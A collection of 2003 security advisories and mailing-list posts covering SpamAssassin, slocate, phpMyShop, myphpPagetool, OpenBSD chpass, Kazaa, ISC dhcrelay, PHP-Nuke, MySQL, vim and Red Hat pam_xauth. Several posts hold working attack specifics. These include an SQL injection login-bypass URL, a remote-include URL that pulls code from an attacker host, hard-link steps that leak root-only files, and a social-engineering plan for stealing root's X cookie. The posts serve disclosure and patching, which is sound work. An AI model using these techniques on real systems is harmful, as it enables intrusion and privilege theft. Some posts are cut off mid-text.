GLSA: Mail-SpamAssasin
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200302-01 - - PACKAGE : Mail-SpamAssasin SUMMARY : arbitrary code execution DATE: 2003-02-02 13:25 UTC EXPLOIT : remote - - - From advisory: "Attacker may be able to execute arbitrary code by sending a specially crafted e-mail to a system using SpamAssassin's spamc program in BSMTP mode (-B option). Versions from 2.40 to 2.43 are affected." Read the full advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=104342896818777&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running dev-perl/Mail-SpamAssasin to Mail-SpamAssasin-2.44 as follows: emerge sync emerge -u Mail-SpamAssasin emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+PRxAfT7nyhUpoZMRAjBlAKCIBHUPx/LE/JJg130OosBtzfXNyACfY+/n hQ1myVlS8MPcIc1BGzoLZzM= =y8WM -END PGP SIGNATURE-
GLSA: slocate
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200302-02 - - PACKAGE : slocate SUMMARY : buffer overflow DATE: 2003-02-02 13:36 UTC EXPLOIT : local - - - From advisory: "The overflow appears when the slocate is runned with two parameters: - -c and -r, using as arguments a 1024 (or 10240, as Knight420 has informed us earlier) bytes string." Read the full advisory at http://www.usg.org.uk/advisories/2003.001.txt SOLUTION It is recommended that all Gentoo Linux users who are running sys-apps/slocate upgrade to slocate-2.7 as follows: emerge sync emerge -u slocate emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+PR7NfT7nyhUpoZMRApEYAJ4uD5qRerI0di1uC0UOIrmMsFaIngCgk2JI XW5zgRH8d560fe7weHDCPrw= =H1YI -END PGP SIGNATURE-
phpMyShop (php)
Informations :
°°
Version : 1.00
Website : http://www.pc-encheres.com
Problem : SQL Injection
PHP Code/Location :
°°°
compte.php :
---
session_start();
if (isset($achat))
{
session_register("achat");
}
else
{
header("location:index.php");
}
include("design/header.php");
require("config.php");
require("fonction.php");
echo"Identification
";
if (isset($valider))
{
$sql = "SELECT id_cli,login_cli,pass_cli FROM $table_client where
login_cli='$identifiant' and pass_cli='$password'";
$sql = mysql_db_query($base,$sql);
$test = mysql_num_rows($sql);
if ($test=="0")
{
?>
alert("Identifiant ou mot de passe non valide!");
echo"Identifiant ou mot de passe non
valide!";
}
else
{
$id_membre = mysql_result($sql,0,"id_cli");
session_register("id_membre");
?>
document.location.href="valide.php"
}
}
[...]
---
Exploit :
°
http://[target]/compte.php?achat=1&valider=1&identifiant='%20OR%20''='&password='%20OR%20''='
Solution :
°°
A patch has been published on http://www.phpsecure.info .
More details :
°°
In French :
http://www.frog-man.org/tutos/phpmyshop.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2Fphpmyshop.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_
Recevez vos e-mails MSN Hotmail par SMS sur votre GSM !
http://www.fr.msn.be/gsm/servicesms/hotmailparsms
myphpPagetool (php)
Informations : °° Version : 0.4.3-1 Website : http://myphppagetool.sourceforge.net/ Problem : Include file PHP Code/Location : °°° In /doc/admin/, in the files index.php, help1.php, help2.php, help3.php, help4.php, help5.php, help6.php, help7.php, help8.php and help9.php : include ($ptinclude . "/pt_config.inc"); [...] Exploit : ° http://[target]/doc/admin/index.php?ptinclude=http://[attacker] with : http://[attacker]/pt_config.inc (if registers_global=ON) Solution : °° A patch has been published on http://www.phpsecure.info . More details : °° In French : http://www.frog-man.org/tutos/myphpPagetool.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FmyphpPagetool.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n _ MSN Search, le moteur de recherche qui pense comme vous ! http://search.fr.msn.be
ASA-0001: OpenBSD chpass/chfn/chsh file content leak
"After" Security Advisory
Title: OpenBSD chpass/chfn/chsh file content leak
Affects: chpass/chfn/chsh from OpenBSD (from 2.0 to 3.2)
Advisory ID: ASA-0001
Release Date: 2003-02-03
Author: Marc Bevand
URL: http://www.epita.fr/~bevand_m/asa/asa-0001
--oOo-- 0. Table of Contents
0. Table of Contents
1. Introduction
2. Problem
3. Solution
4. Conclusion
5. References
6. Attached files
--oOo-- 1. Introduction
OpenBSD [1] provides a setuid-root tool, chpass(1) (or chfn, or
chsh, which are hard links to the same binary file), that allows
editing of the user database information. This tool can be exploited
to partially display the content of any file. But to make this
happen, the content of the file has to match a very particular
format, making the vulnerability practically useless in real-world
situations.
--oOo-- 2. Problem
chpass writes user database information in a temporary file, and
supplies it to an editor for changes. While the editor is running, the
user can suspend it (^Z), replace the temporary file by a hard link to
any file, resume the editor in the foreground, quit it without saving
the file, and let chpass process the file for further operations.
At this point, chpass will open the file (with root permissions
since it is setuid-root), read it line by line and for each of them:
- if it is longer than 2048 bytes, abort the reading
- if it begins by '#', ignore it
- else check the validity of the line
Many conditions have to be respected to make a line valid, I will not
list them here, they are too many. If the line is valid, chpass
processes the next one. Else, if it is invalid and if it begins by
"shell:" (whatever the case is) and if the rest of the line contains
only printable characters (according to isprint(3)) and if none of
them is ':' or ' ', the rest of the line is displayed in an error
message. Here is a concrete example, create a file as root:
# echo "shell: secret_data" >/tmp/sec
# chmod 600 /tmp/sec
Then run chpass under ordinary user privileges (lets say that the
temporary filename you are editing is ``/var/tmp/pw.Loi22925''):
$ chpass# ^Z in the editor
[1]+ Stopped chpass
$ rm /var/tmp/pw.Loi22925
$ ln /tmp/sec /var/tmp/pw.Loi22925
$ fg# then quit the editor
chpass
chpass: secret_data: non-standard shell
^^^
The string "secret_data" is contained in a file owned by root and
readable only by root, but is displayed in this error message.
FreeBSD and NetBSD implementations of chpass have been checked. They
are not vulnerable since the temporary file is created in the
directory ``/etc''.
--oOo-- 3. Solution
OpenBSD maintainers have been contacted on 2003-02-02 about this
issue. The same day, a fix has been committed to the cvs (see the
attached file ``asa-0001.openbsd-chpass.cvs-diff'').
The new code solves the problem by requiring that the link count
be one.
--oOo-- 4. Conclusion
A fix has been applied to OpenBSD-current. The attached file
``asa-0001.openbsd-chpass.cvs-diff'' contains the related cvs diff.
--oOo-- 5. References
[1] OpenBSD
http://www.openbsd.org
--oOo-- 6. Attached files
The following file is also available at:
http://www.epita.fr/~bevand_m/asa/asa-0001.openbsd-chpass.cvs-diff
---8<-- asa-0001.openbsd-chpass.cvs-diff -
Index: edit.c
===
RCS file: /cvs/src/usr.bin/chpass/edit.c,v
retrieving revision 1.23
diff -u -r1.23 edit.c
--- edit.c 31 Jul 2002 22:08:42 - 1.23
+++ edit.c 2 Feb 2003 18:34:02 -
@@ -48,6 +48,7 @@
#include
#include
#include
+#include
#include
#include
#include
@@ -152,12 +153,14 @@
char *p, *q;
ENTRY *ep;
FILE *fp;
+ int fd;
- if (!(fp = fopen(tempname, "r")))
+ if ((fd = open(tempname, O_RDONLY|O_NOFOLLOW)) == -1 ||
+ (fp = fdopen(fd, "r")) == NULL)
pw_error(tempname, 1, 1);
- if (fstat(fileno(fp), &sb))
+ if (fstat(fd, &sb))
pw_error(tempname, 1, 1);
- if (sb.st_size == 0) {
+ if (sb.st_size == 0 || sb.st_nlink != 1) {
warnx("corrupted temporary file");
goto bad;
}
---8<-- asa-0001.openbsd-chpass.cvs-diff -
--
Marc Bevand http://www.epita.fr/~bevand_m
Computer Science School EPITA - System, Network and Security Dept.
Denial of service against Kazaa Media Desktop v2
Hi! It is possible to cause a remote denial of service attack against Kazaa Media Desktop v2. If you can inject a malicous response for the automated ad download of the client, you can cause a bufferoverflow and the denial of service. It may be possible to run arbitary code with this vulnerability. The easiest way to reproduce this behavior is deny all http connections to hosts named *ad*. For example activate the "Block Sites" feature of the NetGear FM114P and block the keyword "ad". After this change, every time you start the vulnerable Kazaa client, the software crashes with the typical windows error message during connection establishment. Tested on Kazaa Media Desktop 2.0.2, Built Tuesday, November 05, 2002, 17:07:24 on Windows XP Professional with NetGear FM114P. My bug report was sent on 03/01/27 to The Sharman Networks Team. Nothing came back - Just the automated default reply. Bye, Marc -- Computer, Technik und Security http://www.computec.ch/ Meine private Webseitehttp://www.computec.ch/mruef/
Re: DoS against DHCP infrastructure with isc dhcrelay
I examined this issue to eventually create a security patch but i failed when diving deeper into the material. Shortly said, i'm not lucky with the patch and here are my considerations. IMHO, when a relay forwards a BOOTREQUEST it must not use the MAC broadcast as a destination - unless the system administrator configured the IP local broadcast address as the destination he likes the requests to be forwarded to. Filling the packet with a MAC broadcast destination is exactly what the Linux packet filter code in ISC dhcpd/relay currently does. This is the ultimate reason for the broadcast storm to appear and this has to be fixed. The current patch just defeats the symptom and is not a solution for this specific problem. However, the patch really addresses another problem, a violation of RFC1542 currently present in the code by not checking the "hops" field. ftp://ftp.rfc-editor.org/in-notes/rfc1542.txt 4.1.1 BOOTREQUEST Messages The relay agent MUST silently discard BOOTREQUEST messages whose 'hops' field exceeds the value 16. A configuration option SHOULD be provided to set this threshold to a smaller value if desired by the network manager. The default setting for a configurable threshold SHOULD be 4. I hope ISC or a third party will provide a proper patch soon. Operating System vendors alread started to give out security advisories based on this "symptom defender patch", i.e. http://www.debian.org/security/2003/dsa-245 -- [EMAIL PROTECTED] Development Team, Cable & Wireless IS Operations Northern Europe
Re: GLSA: Mail-SpamAssasin
Does anyone know if this effects the Mail::SpamAssassin perl libraries when used with amavisd-new? Eric Vollmer At 02:25 PM 2/2/2003 +0100, Daniel Ahlberg wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - GENTOO LINUX SECURITY ANNOUNCEMENT 200302-01 - - PACKAGE : Mail-SpamAssasin SUMMARY : arbitrary code execution DATE: 2003-02-02 13:25 UTC EXPLOIT : remote - - - From advisory: "Attacker may be able to execute arbitrary code by sending a specially crafted e-mail to a system using SpamAssassin's spamc program in BSMTP mode (-B option). Versions from 2.40 to 2.43 are affected." Read the full advisory at http://marc.theaimsgroup.com/?l=bugtraq&m=104342896818777&w=2 SOLUTION It is recommended that all Gentoo Linux users who are running dev-perl/Mail-SpamAssasin to Mail-SpamAssasin-2.44 as follows: emerge sync emerge -u Mail-SpamAssasin emerge clean - - [EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz - - -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.1 (GNU/Linux) iD8DBQE+PRxAfT7nyhUpoZMRAjBlAKCIBHUPx/LE/JJg130OosBtzfXNyACfY+/n hQ1myVlS8MPcIc1BGzoLZzM= =y8WM -END PGP SIGNATURE-
PHP-Nuke Avatar Code injection vulnerability
--- Affected Versions: PHP Nuke versionh 6.0 and below Unaffected version: PHP Nuke 6.5 Impact: --- Allows any user to inject their own HTML or Java code instead of an avatar image. This can lead to very annoying forum posts, and the usual XSS tricks. Summary: --- When users sign up, they are asked to select an avatar from a list of available avatars in the website's /images/forum/avatars folder. When PHP Nuke inserts the image name of the selected avatar into the database, it does not perform any tag or code checks. So therefore if a user gets the site's code and changes the avatar box into a text box, he can enter HTML or java code which will be entered into the database and displayed wherever the avatar is shown. This can lead to very annoying forum posts, and to the theft of users' cookies using XSS. Exploit: --- After you register on the vulnerable PHP Nuke site, login, then on the "Your Account" page click "Your Info", view source, then search for "uid", you should find something like this.. The number you see for value, is your user id. After you got your user id, Launch this html code.. (make sure u change http://NUKESITE to the url of the vulnerable site)
MDKSA-2003:013 - Updated MySQL packages fix DoS vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: MYSQL Advisory ID:MDKSA-2003:013 Date: February 3rd, 2003 Affected versions: 7.2, 8.0, 8.1, 8.2, 9.0, Single Network Firewall 7.2 Problem Description: Aleksander Adamowski informed MandrakeSoft that the MySQL developers fixed a DoS vulnerability in the recently released 3.23.55 version of MySQL. A double free() pointer bug in the mysql_change_user() handling would allow a specially hacked mysql client to crash the main mysqld server. This vulnerability can only be exploited by first logging in with a valid user account. References: http://www.mysql.com/doc/en/News-3.23.55.html Updated Packages: Linux-Mandrake 7.2: d255ec5924b03b9fab09f03ca062bd27 7.2/RPMS/MySQL-3.23.31-1.4mdk.i586.rpm f16b49bcf928ab167b2a00e90a9edf11 7.2/RPMS/MySQL-bench-3.23.31-1.4mdk.i586.rpm 011ff58636683ca1bb7cac749ff3ce7b 7.2/RPMS/MySQL-client-3.23.31-1.4mdk.i586.rpm 46f2240f11cc2e31207b2303965f8cc5 7.2/RPMS/MySQL-devel-3.23.31-1.4mdk.i586.rpm bba1a15efda972301ae58e46d1cd6e50 7.2/RPMS/MySQL-shared-3.23.31-1.4mdk.i586.rpm 8074361a2cd9175d09f59f1c6cde4a8f 7.2/SRPMS/MySQL-3.23.31-1.4mdk.src.rpm Mandrake Linux 8.0: dc68630b7783c0ecf551473af42bf159 8.0/RPMS/MySQL-3.23.36-2.3mdk.i586.rpm 8332df1f032f310aa53972736f69a707 8.0/RPMS/MySQL-bench-3.23.36-2.3mdk.i586.rpm 080e914452e2d64abfefb96020d07f9e 8.0/RPMS/MySQL-client-3.23.36-2.3mdk.i586.rpm fe480408a68c32f442322625ac040c6c 8.0/RPMS/MySQL-devel-3.23.36-2.3mdk.i586.rpm c058662eb300a6e2589ab0a512638d3e 8.0/RPMS/MySQL-shared-3.23.36-2.3mdk.i586.rpm 7a2aeac7740ecc34db7a794c6928fbcb 8.0/SRPMS/MySQL-3.23.36-2.3mdk.src.rpm Mandrake Linux 8.0/PPC: 926ee5252994fe0a29524121103725d5 ppc/8.0/RPMS/MySQL-3.23.36-2.3mdk.ppc.rpm cdfa13b86f231bc8caf1ac14ba2b0db3 ppc/8.0/RPMS/MySQL-bench-3.23.36-2.3mdk.ppc.rpm 27de6cbecb726095e345cc9866908520 ppc/8.0/RPMS/MySQL-client-3.23.36-2.3mdk.ppc.rpm 263ff27104820e6413c0758627c6d283 ppc/8.0/RPMS/MySQL-devel-3.23.36-2.3mdk.ppc.rpm d74e18d7baf1d4b91cdc7fe6acdd7c43 ppc/8.0/RPMS/MySQL-shared-3.23.36-2.3mdk.ppc.rpm 7a2aeac7740ecc34db7a794c6928fbcb ppc/8.0/SRPMS/MySQL-3.23.36-2.3mdk.src.rpm Mandrake Linux 8.1: 8c41c02e9154202ee24b4a6c7dd2d5d8 8.1/RPMS/MySQL-3.23.41-5.3mdk.i586.rpm efe74fb794a8ed7d0069f075b8ccc892 8.1/RPMS/MySQL-bench-3.23.41-5.3mdk.i586.rpm 8027c12246c3c07137f7507ed3643177 8.1/RPMS/MySQL-client-3.23.41-5.3mdk.i586.rpm bae66fe96c1d1756cc562e932a11f323 8.1/RPMS/MySQL-devel-3.23.41-5.3mdk.i586.rpm c78af586765e35becd9af176b1253626 8.1/RPMS/MySQL-shared-3.23.41-5.3mdk.i586.rpm a8ba59c7fe788779b97af683db9b08b8 8.1/SRPMS/MySQL-3.23.41-5.3mdk.src.rpm Mandrake Linux 8.1/IA64: e421b83e8476b59a64dae5d3ebb9c208 ia64/8.1/RPMS/MySQL-3.23.41-5.3mdk.ia64.rpm 5d78fccdeb0876e5441287b5dc77cc53 ia64/8.1/RPMS/MySQL-bench-3.23.41-5.3mdk.ia64.rpm 59d604e7dfb6ac945d2f0f05eaec0a57 ia64/8.1/RPMS/MySQL-client-3.23.41-5.3mdk.ia64.rpm 1a59779bd26b2480b6913741dc8ee5b1 ia64/8.1/RPMS/MySQL-devel-3.23.41-5.3mdk.ia64.rpm 3f4c5e8bef6445f8a1ce037a3b8213fa ia64/8.1/RPMS/MySQL-shared-3.23.41-5.3mdk.ia64.rpm a8ba59c7fe788779b97af683db9b08b8 ia64/8.1/SRPMS/MySQL-3.23.41-5.3mdk.src.rpm Mandrake Linux 8.2: ec6dbc415b424a25c29909b984de64ce 8.2/RPMS/libmysql10-3.23.47-5.3mdk.i586.rpm c18da1c2d5cede8022a26b875c09b136 8.2/RPMS/libmysql10-devel-3.23.47-5.3mdk.i586.rpm 3c283667d8175ff75b183254f8535ec6 8.2/RPMS/MySQL-3.23.47-5.3mdk.i586.rpm eab6e4de9ef2de755e67f796fafd4ccd 8.2/RPMS/MySQL-bench-3.23.47-5.3mdk.i586.rpm 639e03c66d6fbd8059d33a481b6ff9d9 8.2/RPMS/MySQL-client-3.23.47-5.3mdk.i586.rpm 394487ebcf063f310eb7719d637b26da 8.2/SRPMS/MySQL-3.23.47-5.3mdk.src.rpm Mandrake Linux 8.2/PPC: dbbe494b3581f8fbdd663acf0ff321ff ppc/8.2/RPMS/libmysql10-3.23.47-5.3mdk.ppc.rpm 39d434dfefe8dcb505ea13d001ab43f6 ppc/8.2/RPMS/libmysql10-devel-3.23.47-5.3mdk.ppc.rpm ef09c1c6cf68f09cf8798635a4f7aea6 ppc/8.2/RPMS/MySQL-3.23.47-5.3mdk.ppc.rpm f714db18658d1079354ca66a9c38c718 ppc/8.2/RPMS/MySQL-bench-3.23.47-5.3mdk.ppc.rpm 3ea6463cb34fcfcb9fb12d86f1bcc2a8 ppc/8.2/RPMS/MySQL-client-3.23.47-5.3mdk.ppc.rpm 394487ebcf063f310eb7719d637b26da ppc/8.2/SRPMS/MySQL-3.23.47-5.3mdk.src.rpm Mandrake Linux 9.0: 04000c84cfc2c86923ef61b11948dfe6 9.0/RPMS/libmysql10-3.23.52-1.3mdk.i586.rpm 9948baccb444b39f76897aa8f5777cb8 9.0/RPMS/libmysql10-devel-3.23.52-1.3mdk.i586.rpm cefb16d65faf472ea479ab5b77ac9b91 9.0/RPMS/MySQL-3.23.52-1.3mdk.i586.rpm 599910eab67704489f360b569d2a1
MDKSA-2003:012 - Updated vim packages fix arbitrary command execution vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Mandrake Linux Security Update Advisory Package name: vim Advisory ID:MDKSA-2003:012 Date: February 3rd, 2003 Affected versions: 7.2, 8.0, 8.1, 8.2, 9.0, Multi Network Firewall 8.2, Single Network Firewall 7.2 Problem Description: A vulnerability was discovered in vim by Georgi Guninski that allows arbitrary command execution using the libcall feature found in modelines. A patch to fix this problem was introduced in vim 6.1 patchlevel 265. This patch has been applied to the provided update packages. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1377 http://www.guninski.com/vim1.html Updated Packages: Linux-Mandrake 7.2: e62b907dd9bc290db9a5d5900feac367 7.2/RPMS/vim-X11-6.1-34.2mdk.i586.rpm 0b12782f73387ff9093e8ce185e97e82 7.2/RPMS/vim-common-6.1-34.2mdk.i586.rpm f7561a4602c9acfd1b37076770fe7c46 7.2/RPMS/vim-enhanced-6.1-34.2mdk.i586.rpm 09f80b47a4212450a45fa1043d349c33 7.2/RPMS/vim-minimal-6.1-34.2mdk.i586.rpm d0800362fc610cbb87beb9f3d9d1acf7 7.2/SRPMS/vim-6.1-34.2mdk.src.rpm Mandrake Linux 8.0: 4d9f0bfee91838d6c53a9f309610ffad 8.0/RPMS/vim-X11-6.1-34.1mdk.i586.rpm a210af2a18f4ba042376c922e6a536fc 8.0/RPMS/vim-common-6.1-34.1mdk.i586.rpm a31f7d72537c6c3b62df50503641a2c3 8.0/RPMS/vim-enhanced-6.1-34.1mdk.i586.rpm 47270a4e22cbfe26f17c956543579af3 8.0/RPMS/vim-minimal-6.1-34.1mdk.i586.rpm 6b905a4b36354e315449ce7da6ce7622 8.0/SRPMS/vim-6.1-34.1mdk.src.rpm Mandrake Linux 8.0/PPC: ebeca31f7c4b907fd5fda1689c2384e8 ppc/8.0/RPMS/vim-X11-6.1-34.1mdk.ppc.rpm 34834a9c4e4c172f2c1499b7767ee103 ppc/8.0/RPMS/vim-common-6.1-34.1mdk.ppc.rpm afe96fb6447a6ef42360a35c2a383de9 ppc/8.0/RPMS/vim-enhanced-6.1-34.1mdk.ppc.rpm 2b8fc174cdaf6563951405cce723531c ppc/8.0/RPMS/vim-minimal-6.1-34.1mdk.ppc.rpm 6b905a4b36354e315449ce7da6ce7622 ppc/8.0/SRPMS/vim-6.1-34.1mdk.src.rpm Mandrake Linux 8.1: d42a33d13880ce5c1dd9c285691f41fa 8.1/RPMS/vim-X11-6.1-34.1mdk.i586.rpm 4ed951a7f9b053a7a9d24e7ea1be67c9 8.1/RPMS/vim-common-6.1-34.1mdk.i586.rpm 61a0f648cdc42753672d2702b226e5e0 8.1/RPMS/vim-enhanced-6.1-34.1mdk.i586.rpm 4d36b92829b9258d0591fcc8e7401f10 8.1/RPMS/vim-minimal-6.1-34.1mdk.i586.rpm 6b905a4b36354e315449ce7da6ce7622 8.1/SRPMS/vim-6.1-34.1mdk.src.rpm Mandrake Linux 8.1/IA64: 4159e1bcf5f22cd150610e3f5d88a0d0 ia64/8.1/RPMS/vim-X11-6.1-34.1mdk.ia64.rpm ed436066882de3fdce84851706a3ea65 ia64/8.1/RPMS/vim-common-6.1-34.1mdk.ia64.rpm 1d2c6e773b971c7fce8fe264f2493b3b ia64/8.1/RPMS/vim-enhanced-6.1-34.1mdk.ia64.rpm 9c099217dba8ebffee5f7fe626db9026 ia64/8.1/RPMS/vim-minimal-6.1-34.1mdk.ia64.rpm 6b905a4b36354e315449ce7da6ce7622 ia64/8.1/SRPMS/vim-6.1-34.1mdk.src.rpm Mandrake Linux 8.2: a6d2071eb37105aec6242c1ceeca979b 8.2/RPMS/vim-X11-6.1-34.1mdk.i586.rpm a111ab20a77dcb625c20d1874b0ce91d 8.2/RPMS/vim-common-6.1-34.1mdk.i586.rpm 77c31c1ebc1eb41c6f9f3b78c9f00b34 8.2/RPMS/vim-enhanced-6.1-34.1mdk.i586.rpm 61ca6d154283f12fbf2eb417103c03e7 8.2/RPMS/vim-minimal-6.1-34.1mdk.i586.rpm 6b905a4b36354e315449ce7da6ce7622 8.2/SRPMS/vim-6.1-34.1mdk.src.rpm Mandrake Linux 8.2/PPC: 993235cea1a3535697cd8a47d8064766 ppc/8.2/RPMS/vim-X11-6.1-34.3mdk.ppc.rpm ff1ddc1f0df266eece315314ea3e1b0b ppc/8.2/RPMS/vim-common-6.1-34.3mdk.ppc.rpm 3d71a31270ac817c84cb9db1df4ba53d ppc/8.2/RPMS/vim-enhanced-6.1-34.3mdk.ppc.rpm 278380bf389d2c0a58771a61f82251ea ppc/8.2/RPMS/vim-minimal-6.1-34.3mdk.ppc.rpm eab938b78ab2aa578979c86e44aaf4a9 ppc/8.2/SRPMS/vim-6.1-34.3mdk.src.rpm Mandrake Linux 9.0: 5e7eac6c390caf51751b7dea6ba6a1a5 9.0/RPMS/vim-X11-6.1-34.1mdk.i586.rpm 1526a529ac06942ff5b34935d71d48e9 9.0/RPMS/vim-common-6.1-34.1mdk.i586.rpm bf9fda1e219dad2497efe0b8d42ef263 9.0/RPMS/vim-enhanced-6.1-34.1mdk.i586.rpm fbb42d4346a7dbbda450896c46b30e2b 9.0/RPMS/vim-minimal-6.1-34.1mdk.i586.rpm 6b905a4b36354e315449ce7da6ce7622 9.0/SRPMS/vim-6.1-34.1mdk.src.rpm Multi Network Firewall 8.2: a111ab20a77dcb625c20d1874b0ce91d mnf8.2/RPMS/vim-common-6.1-34.1mdk.i586.rpm 77c31c1ebc1eb41c6f9f3b78c9f00b34 mnf8.2/RPMS/vim-enhanced-6.1-34.1mdk.i586.rpm 61ca6d154283f12fbf2eb417103c03e7 mnf8.2/RPMS/vim-minimal-6.1-34.1mdk.i586.rpm 6b905a4b36354e315449ce7da6ce7622 mnf8.2/SRPMS/vim-6.1-34.1mdk.src.rpm Single Network Firewall 7.2: 0b12782f73387ff9093e8ce185e97e82 snf7.2/RPMS/vim-common-6.1-34.2mdk.i586.rpm f7561a4602c9acfd1b37076770fe7c46 snf7.2/RPMS/vim-enhanced-6.1-34.2mdk.i586.rpm d0800362fc610cbb87beb9f3d9d1acf7 snf7.2/SRPMS/vim-6.1-34.2mdk.s
BDT_AV200212140001: Insecure default: Using pam_xauth for su from sh-utils package
Bedatec Security Advisory 200212140001
--
Discovered : 2002-12-08
Vendor notified : 2002-12-14 (sorry for the delay, had to check if
default is still set for RH 8.0)
Author : Andreas Beck <[EMAIL PROTECTED]>
Application : su as contained in e.g. sh-utils-2.0.12-3.
RedHat pam packages like e.g. pam-0.75-18.7
Severity : Insecure default could allow X Session cookie stealing
from root thus gaining root priviledges for a user
already having unpriviledged acess.
Risk : Medium (root compromise, but needs interaction with root)
Vendor status: Vendor will make updated packages available shortly
Vendor statement : "Red Hat is working on updated pam_xauth packages
which adds back the missing ACL functionality.
These will be available shortly from
http://rhn.redhat.com/errata/ and via the
Red Hat Network."
Affected Versions: At least Redhat 8.0 and 7.1 are vulnerable. Supposedly
all versions in between are as well.
RedHat 7.0 and before are _NOT_ vulnerable.
CVE reference: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1160
Overview:
-
On Redhat Linux including 8.0, PAM comes with a module pam_xauth which can
forward X MIT-Magic-Cookies to newly instantiated sessions.
While this is a nice feature and generally harmless for the case that an
unpriviledged user elevates his priviledges to root using e.g. su or the
various wrappers for some root-only programs, it poses a security risk
for root, if root uses su in order to assume the id of a less priviledged
user, e.g. for troubleshooting purposes.
Details:
While checking an unrelated problem, we discovered that using su would
allow the target user to connect to the running X session owned by the
user that used su.
Quick checking
> becka@cupido$ su devel
> Password:
> [devel@cupido becka]$ xauth
> Using authority file /home/devel/.xauthupNGf8
revealed, that su seems to forward the MIT-Magic-Cookie to the target
user in a temporary .xauth-File.
> [devel@cupido devel]$ ls -l /home/devel/.xauthupNGf8
> -rw---1 develdevel 51 Dez 8 00:26 .xauthupNGf8
This file is owned by the target user and only readable by the target
user, as it must/should be for the method to work.
This behaviour causes a security risk when root uses su to become an
unpriviledged user for troubleshooting an account.
Possible attack scenario:
-
Write a mail to local root, stating that you have difficulties logging in,
like e.g. you get logged out after 5 seconds in which you can run programs
and everything, you just get logged out afterwards.
This should be a strange enough description, that root will probably want to
verify this behaviour.
Assuming root is running an X session on the console under his normal login
name, he will probably su to root to allow to assume the id of the
complaining user without having to supply a password by using su again.
[Depending on the method of connection, a remote X server should also do.]
The default entries in /etc/pam.d/su will cause the X session cookie to be
forwarded to first root and then the user whose "problem" is to be
investigated.
Right after sending the mail, said user places a process in memory that
will wait for the .xauth-file to appear. Only a very careful root would
check for running processes, and even then, he is not likely to shut down
something like "longrunning_calculation" that is niced up and all.
The process will grab the contents of the .xauth-File and can then
connect to the X server, as it knows the cookie. Though this is annoying
by itself (User can see what is on the root desktop, send fake events,
thus run programs as the user who started the desktop etc.), in this
scenario it is much worse, as we know that there is a terminal open
that has just su'ed to the current user, very probably from _root_.
Just send it "exit" and then execute whatever you like.
This way you even reproduce the problem you told root about.
O.K. - he might get suspicious now, but the damage is done.
Some webpages suggest, that pam_xauth can be customized to only forward
cookies under certain conditions. However neither the manpage for su
nor the one for pam_xauth mention how to do that. Moreover the su manpage
does not state, that X forwarding is on by default.
Proof of concept/How to reproduce:
--
Log in as an unpriviledged user ("victim"). Start up X if necessary.
Get root using su, then assume the ID of another unpriviledged user
("attacker") using su.
Log in as "attacker" remotely or from a console. Locate the -xauth file.
Give it to an arbitrary X program using the XAUTHORITY environment
variable and set display accordingly. Th
